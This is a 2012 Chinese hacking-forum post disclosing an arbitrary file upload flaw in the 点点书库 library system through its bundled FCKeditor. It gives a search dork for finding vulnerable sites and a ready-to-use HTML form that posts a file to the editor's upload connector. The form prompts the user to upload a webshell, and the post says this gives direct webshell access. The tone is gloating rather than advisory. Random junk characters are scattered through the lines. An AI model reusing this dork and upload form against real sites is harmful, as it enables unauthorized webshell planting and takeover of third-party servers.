找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 7442|回复: 0
打印 上一主题 下一主题

点点书库图书馆系统文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:20:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
主题:图书馆系统任意文件上传漏洞# G+ k3 Z& @* t
作者:冰锋刺客0 _/ L4 g5 Q. I- K
厂商:点击书(dianjishu.com)
& u! |* O5 l" z( z( }1 x 日期:2012-6-218 q; |0 v3 o7 l2 o4 L
5 v4 ~( U& i' {% f) a) ~' }
I 概述
5 G7 D4 H+ G3 ?$ Q6 h0 z# d   点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
1 o( Y4 z) }7 ?+ E II 简介
) n4 R2 ?2 [5 H5 T5 ?5 }& ^   关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"9 k! a: C$ R' n. O' A! Z. w# p
补充一个漏洞5 \! Z2 W3 Q+ n; \1 s6 x
<form id="frmUpload" enctype="multipart/form-data") i2 u9 ]' Z. E; p( o( V
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>4 _, T0 m: n: W, X. L- i
<input id="btnUpload" type="submit" value="操翻他">6 Q6 F( t/ d; d2 b7 S* w6 {0 e
</form>( n6 A0 O/ B' q: L$ M3 x0 O/ k% m
你们懂的
$ N5 H3 Z$ Z+ v* m0 M 那傻逼提供还需要改包.
7 c3 ~. D" n' X/ q$ H1 R 自己看了下源代码发现fckeditor
" u$ p2 g; H; l9 B, P 直接秒杀. b9 q# M) ~6 ]
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表